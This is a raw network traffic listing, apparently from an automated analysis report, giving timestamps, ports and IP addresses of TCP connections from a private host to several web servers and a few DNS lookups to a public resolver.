Mar 24, 2025 07:19:31.152040005 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.152071953 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.152100086 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.152113914 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.152129889 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.153008938 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.153068066 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.153079033 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.153259993 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.153306007 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.153312922 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.153980970 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.154021025 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.154038906 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.154052019 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.154074907 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.154486895 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.154532909 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.154542923 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.154639959 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.154691935 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.154700041 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.155755043 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.155806065 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.155817986 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.156064987 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.156115055 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.156124115 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.156693935 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.156742096 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.156754017 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.157527924 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.157589912 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.157602072 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.159513950 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.159548998 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.159589052 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.159598112 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.159625053 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.159646988 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.163810015 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.163827896 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.163883924 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.163898945 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.163918972 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.163937092 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.164386034 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.164403915 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.164452076 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.164463043 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.167213917 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.169889927 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.169909954 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.169950962 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.169965029 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.170011044 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.170011044 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.170566082 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.170582056 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.170629025 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.170641899 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.172122002 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.175360918 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.175384998 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.175451040 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.175465107 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.175721884 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.175750017 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.175780058 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.175792933 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.175813913 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.175841093 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.200068951 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.243448019 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.243479967 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.243567944 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.243593931 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.244386911 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.245697975 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.245713949 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.245765924 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.245780945 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.247801065 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.247823954 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.247869015 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.247884989 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.247905970 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.247925997 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.249070883 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.249110937 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.249125004 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.249130964 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.249160051 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.249171019 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.250459909 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.250480890 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.250544071 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.250557899 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.252162933 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.252537966 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.252583981 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.252599955 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.252605915 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.252643108 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.351205111 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351274014 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351294994 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351339102 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351380110 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351474047 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.351475000 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.351494074 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351511955 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351552010 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.351568937 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351579905 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.351583958 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351612091 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.351614952 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351628065 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351644993 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.351648092 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351686954 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.351694107 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351703882 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351728916 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351733923 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.351763964 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351773977 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.351782084 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351797104 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351819038 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.351824999 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351850033 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.351872921 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351892948 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.351922035 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.351954937 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.384366035 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.384392977 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.384490967 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.385299921 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.385309935 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.385333061 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.385349035 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.385534048 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.385540962 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.385549068 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.385607004 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.385699987 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.491800070 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.492707968 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.498008013 CET	60834	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:31.498034000 CET	443	60834	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:31.631478071 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:31.631520033 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:31.631620884 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:31.631925106 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:31.631936073 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:31.820239067 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:31.820297956 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:31.821638107 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:31.821657896 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:31.821904898 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:31.822247028 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:31.868328094 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:31.995393991 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.006146908 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.006171942 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.006211996 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:32.006234884 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.006249905 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:32.006287098 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:32.027239084 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.027266979 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.027318954 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:32.027333975 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.027354002 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:32.073759079 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:32.095901966 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.095927954 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.095978022 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:32.095994949 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.096057892 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:32.107956886 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.107981920 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.108035088 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:32.108042002 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.108115911 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:32.120090008 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.120116949 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.120157003 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:32.120162964 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.120210886 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:32.124663115 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.124741077 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:32.124747992 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.124779940 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.124831915 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:32.156040907 CET	60836	443	192.168.2.24	151.101.194.137
Mar 24, 2025 07:19:32.156079054 CET	443	60836	151.101.194.137	192.168.2.24
Mar 24, 2025 07:19:32.270431042 CET	60835	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:32.316329956 CET	443	60835	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:32.580797911 CET	443	60835	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:32.580879927 CET	443	60835	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:32.581088066 CET	60835	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:32.583422899 CET	60835	443	192.168.2.24	104.21.80.1
Mar 24, 2025 07:19:32.583446980 CET	443	60835	104.21.80.1	192.168.2.24
Mar 24, 2025 07:19:32.680267096 CET	60839	443	192.168.2.24	35.190.80.1
Mar 24, 2025 07:19:32.680315971 CET	443	60839	35.190.80.1	192.168.2.24
Mar 24, 2025 07:19:32.680434942 CET	60839	443	192.168.2.24	35.190.80.1
Mar 24, 2025 07:19:32.680608988 CET	60839	443	192.168.2.24	35.190.80.1
Mar 24, 2025 07:19:32.680624008 CET	443	60839	35.190.80.1	192.168.2.24
Mar 24, 2025 07:19:32.872930050 CET	443	60839	35.190.80.1	192.168.2.24
Mar 24, 2025 07:19:32.873452902 CET	60839	443	192.168.2.24	35.190.80.1
Mar 24, 2025 07:19:32.874217987 CET	60839	443	192.168.2.24	35.190.80.1
Mar 24, 2025 07:19:32.874226093 CET	443	60839	35.190.80.1	192.168.2.24
Mar 24, 2025 07:19:32.874449015 CET	443	60839	35.190.80.1	192.168.2.24
Mar 24, 2025 07:19:32.878109932 CET	60839	443	192.168.2.24	35.190.80.1
Mar 24, 2025 07:19:32.924324036 CET	443	60839	35.190.80.1	192.168.2.24
Mar 24, 2025 07:19:33.078721046 CET	443	60839	35.190.80.1	192.168.2.24
Mar 24, 2025 07:19:33.078788996 CET	443	60839	35.190.80.1	192.168.2.24
Mar 24, 2025 07:19:33.078922033 CET	60839	443	192.168.2.24	35.190.80.1
Mar 24, 2025 07:19:33.079654932 CET	60839	443	192.168.2.24	35.190.80.1
Mar 24, 2025 07:19:33.079655886 CET	60840	443	192.168.2.24	35.190.80.1
Mar 24, 2025 07:19:33.079668999 CET	443	60839	35.190.80.1	192.168.2.24
Mar 24, 2025 07:19:33.079695940 CET	443	60840	35.190.80.1	192.168.2.24
Mar 24, 2025 07:19:33.079821110 CET	60840	443	192.168.2.24	35.190.80.1
Mar 24, 2025 07:19:33.080092907 CET	60840	443	192.168.2.24	35.190.80.1
Mar 24, 2025 07:19:33.080115080 CET	443	60840	35.190.80.1	192.168.2.24
Mar 24, 2025 07:19:33.265759945 CET	443	60840	35.190.80.1	192.168.2.24
Mar 24, 2025 07:19:33.266118050 CET	60840	443	192.168.2.24	35.190.80.1
Mar 24, 2025 07:19:33.266149044 CET	443	60840	35.190.80.1	192.168.2.24
Mar 24, 2025 07:19:33.268213034 CET	60840	443	192.168.2.24	35.190.80.1
Mar 24, 2025 07:19:33.268220901 CET	443	60840	35.190.80.1	192.168.2.24
Mar 24, 2025 07:19:33.478905916 CET	443	60840	35.190.80.1	192.168.2.24
Mar 24, 2025 07:19:33.478979111 CET	443	60840	35.190.80.1	192.168.2.24
Mar 24, 2025 07:19:33.479563951 CET	60840	443	192.168.2.24	35.190.80.1
Mar 24, 2025 07:19:33.479598045 CET	443	60840	35.190.80.1	192.168.2.24
Mar 24, 2025 07:19:33.479629040 CET	60840	443	192.168.2.24	35.190.80.1
Mar 24, 2025 07:19:33.479664087 CET	60840	443	192.168.2.24	35.190.80.1
Mar 24, 2025 07:19:35.224176884 CET	60817	443	192.168.2.24	2.19.122.66
Mar 24, 2025 07:19:35.224337101 CET	60817	443	192.168.2.24	2.19.122.66
Mar 24, 2025 07:19:35.224380016 CET	60817	443	192.168.2.24	2.19.122.66
Mar 24, 2025 07:19:35.428464890 CET	443	60817	2.19.122.66	192.168.2.24
Mar 24, 2025 07:19:35.428497076 CET	443	60817	2.19.122.66	192.168.2.24
Mar 24, 2025 07:19:35.428513050 CET	443	60817	2.19.122.66	192.168.2.24
Mar 24, 2025 07:19:35.990952969 CET	443	60817	2.19.122.66	192.168.2.24
Mar 24, 2025 07:19:35.991029978 CET	60817	443	192.168.2.24	2.19.122.66
Mar 24, 2025 07:19:36.070482016 CET	443	60817	2.19.122.66	192.168.2.24
Mar 24, 2025 07:19:36.070534945 CET	443	60817	2.19.122.66	192.168.2.24
Mar 24, 2025 07:19:36.070570946 CET	60817	443	192.168.2.24	2.19.122.66
Mar 24, 2025 07:19:36.070605040 CET	60817	443	192.168.2.24	2.19.122.66
Mar 24, 2025 07:19:36.078494072 CET	60817	443	192.168.2.24	2.19.122.66
Mar 24, 2025 07:19:36.394213915 CET	443	60817	2.19.122.66	192.168.2.24
Mar 24, 2025 07:19:36.394279003 CET	60817	443	192.168.2.24	2.19.122.66
Mar 24, 2025 07:19:36.395617008 CET	60817	443	192.168.2.24	2.19.122.66
Mar 24, 2025 07:19:36.492481947 CET	443	60817	2.19.122.66	192.168.2.24
Mar 24, 2025 07:19:36.492672920 CET	60817	443	192.168.2.24	2.19.122.66
Mar 24, 2025 07:19:36.603086948 CET	443	60817	2.19.122.66	192.168.2.24
Mar 24, 2025 07:19:36.776854992 CET	443	60817	2.19.122.66	192.168.2.24
Mar 24, 2025 07:19:36.776937008 CET	60817	443	192.168.2.24	2.19.122.66
Mar 24, 2025 07:19:36.777221918 CET	443	60817	2.19.122.66	192.168.2.24
Mar 24, 2025 07:19:36.777272940 CET	60817	443	192.168.2.24	2.19.122.66
Mar 24, 2025 07:19:39.047702074 CET	443	60832	142.251.32.100	192.168.2.24
Mar 24, 2025 07:19:39.047760963 CET	443	60832	142.251.32.100	192.168.2.24
Mar 24, 2025 07:19:39.047827005 CET	60832	443	192.168.2.24	142.251.32.100
Mar 24, 2025 07:19:40.886635065 CET	60832	443	192.168.2.24	142.251.32.100
Mar 24, 2025 07:19:40.886708975 CET	443	60832	142.251.32.100	192.168.2.24
Mar 24, 2025 07:20:08.133522987 CET	60845	80	192.168.2.24	142.251.40.195
Mar 24, 2025 07:20:08.222455025 CET	80	60845	142.251.40.195	192.168.2.24
Mar 24, 2025 07:20:08.222538948 CET	60845	80	192.168.2.24	142.251.40.195
Mar 24, 2025 07:20:08.222692013 CET	60845	80	192.168.2.24	142.251.40.195
Mar 24, 2025 07:20:08.311636925 CET	80	60845	142.251.40.195	192.168.2.24
Mar 24, 2025 07:20:08.312007904 CET	80	60845	142.251.40.195	192.168.2.24
Mar 24, 2025 07:20:08.318247080 CET	60845	80	192.168.2.24	142.251.40.195
Mar 24, 2025 07:20:08.408257961 CET	80	60845	142.251.40.195	192.168.2.24
Mar 24, 2025 07:20:08.414997101 CET	60845	80	192.168.2.24	142.251.40.195
Mar 24, 2025 07:20:08.504606009 CET	80	60845	142.251.40.195	192.168.2.24
Mar 24, 2025 07:20:08.556977987 CET	60845	80	192.168.2.24	142.251.40.195
Mar 24, 2025 07:20:28.745464087 CET	60853	443	192.168.2.24	142.251.32.100
Mar 24, 2025 07:20:28.745517015 CET	443	60853	142.251.32.100	192.168.2.24
Mar 24, 2025 07:20:28.745611906 CET	60853	443	192.168.2.24	142.251.32.100
Mar 24, 2025 07:20:28.745767117 CET	60853	443	192.168.2.24	142.251.32.100
Mar 24, 2025 07:20:28.745780945 CET	443	60853	142.251.32.100	192.168.2.24
Mar 24, 2025 07:20:28.938433886 CET	443	60853	142.251.32.100	192.168.2.24
Mar 24, 2025 07:20:28.938808918 CET	60853	443	192.168.2.24	142.251.32.100
Mar 24, 2025 07:20:28.938846111 CET	443	60853	142.251.32.100	192.168.2.24
Mar 24, 2025 07:20:38.980460882 CET	443	60853	142.251.32.100	192.168.2.24
Mar 24, 2025 07:20:38.980526924 CET	443	60853	142.251.32.100	192.168.2.24
Mar 24, 2025 07:20:38.980660915 CET	60853	443	192.168.2.24	142.251.32.100
Mar 24, 2025 07:20:40.886919975 CET	60853	443	192.168.2.24	142.251.32.100
Mar 24, 2025 07:20:40.886961937 CET	443	60853	142.251.32.100	192.168.2.24
Mar 24, 2025 07:20:55.931957960 CET	60818	443	192.168.2.24	23.219.161.139
Mar 24, 2025 07:20:56.021615028 CET	443	60818	23.219.161.139	192.168.2.24
Mar 24, 2025 07:20:56.021744967 CET	60818	443	192.168.2.24	23.219.161.139
Mar 24, 2025 07:20:56.021755934 CET	443	60818	23.219.161.139	192.168.2.24
Mar 24, 2025 07:20:56.021797895 CET	60818	443	192.168.2.24	23.219.161.139
Mar 24, 2025 07:20:56.260968924 CET	60820	80	192.168.2.24	23.203.176.221
Mar 24, 2025 07:20:56.261053085 CET	60819	80	192.168.2.24	199.232.214.172
Mar 24, 2025 07:20:56.349817991 CET	80	60819	199.232.214.172	192.168.2.24
Mar 24, 2025 07:20:56.349836111 CET	80	60819	199.232.214.172	192.168.2.24
Mar 24, 2025 07:20:56.349891901 CET	60819	80	192.168.2.24	199.232.214.172
Mar 24, 2025 07:20:56.350728989 CET	80	60820	23.203.176.221	192.168.2.24
Mar 24, 2025 07:20:56.350845098 CET	60820	80	192.168.2.24	23.203.176.221
Mar 24, 2025 07:21:08.712769032 CET	60845	80	192.168.2.24	142.251.40.195
Mar 24, 2025 07:21:08.802202940 CET	80	60845	142.251.40.195	192.168.2.24
Mar 24, 2025 07:21:08.802273989 CET	60845	80	192.168.2.24	142.251.40.195
Mar 24, 2025 07:21:28.808646917 CET	60860	443	192.168.2.24	142.251.32.100
Mar 24, 2025 07:21:28.808708906 CET	443	60860	142.251.32.100	192.168.2.24
Mar 24, 2025 07:21:28.808779955 CET	60860	443	192.168.2.24	142.251.32.100
Mar 24, 2025 07:21:28.809025049 CET	60860	443	192.168.2.24	142.251.32.100
Mar 24, 2025 07:21:28.809039116 CET	443	60860	142.251.32.100	192.168.2.24
Mar 24, 2025 07:21:29.003943920 CET	443	60860	142.251.32.100	192.168.2.24
Mar 24, 2025 07:21:29.004360914 CET	60860	443	192.168.2.24	142.251.32.100
Mar 24, 2025 07:21:29.004394054 CET	443	60860	142.251.32.100	192.168.2.24
Mar 24, 2025 07:21:36.777122974 CET	443	60817	2.19.122.66	192.168.2.24
Mar 24, 2025 07:21:36.777147055 CET	443	60817	2.19.122.66	192.168.2.24
Mar 24, 2025 07:21:36.777241945 CET	60817	443	192.168.2.24	2.19.122.66
Mar 24, 2025 07:21:36.777450085 CET	60817	443	192.168.2.24	2.19.122.66
Mar 24, 2025 07:21:36.964992046 CET	443	60817	2.19.122.66	192.168.2.24
Mar 24, 2025 07:21:39.008452892 CET	443	60860	142.251.32.100	192.168.2.24
Mar 24, 2025 07:21:39.008531094 CET	443	60860	142.251.32.100	192.168.2.24
Mar 24, 2025 07:21:39.008723974 CET	60860	443	192.168.2.24	142.251.32.100
Mar 24, 2025 07:21:40.229382038 CET	60860	443	192.168.2.24	142.251.32.100
Mar 24, 2025 07:21:40.229418039 CET	443	60860	142.251.32.100	192.168.2.24

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 24, 2025 07:19:15.907533884 CET	63510	53	192.168.2.24	1.1.1.1
Mar 24, 2025 07:19:16.022826910 CET	53	63510	1.1.1.1	192.168.2.24
Mar 24, 2025 07:19:24.857562065 CET	53	53674	1.1.1.1	192.168.2.24
Mar 24, 2025 07:19:24.910402060 CET	53	50317	1.1.1.1	192.168.2.24
Mar 24, 2025 07:19:26.205630064 CET	53	56497	1.1.1.1	192.168.2.24
Mar 24, 2025 07:19:28.702358961 CET	55721	53	192.168.2.24	1.1.1.1
Mar 24, 2025 07:19:28.702613115 CET	64596	53	192.168.2.24	1.1.1.1
Mar 24, 2025 07:19:28.800458908 CET	53	64596	1.1.1.1	192.168.2.24
Mar 24, 2025 07:19:28.801032066 CET	53	55721	1.1.1.1	192.168.2.24
Mar 24, 2025 07:19:30.157797098 CET	53762	53	192.168.2.24	1.1.1.1
Mar 24, 2025 07:19:30.158314943 CET	52913	53	192.168.2.24	1.1.1.1
Mar 24, 2025 07:19:30.273133039 CET	53	53762	1.1.1.1	192.168.2.24
Mar 24, 2025 07:19:30.273459911 CET	53	52913	1.1.1.1	192.168.2.24
Mar 24, 2025 07:19:31.531034946 CET	56897	53	192.168.2.24	1.1.1.1
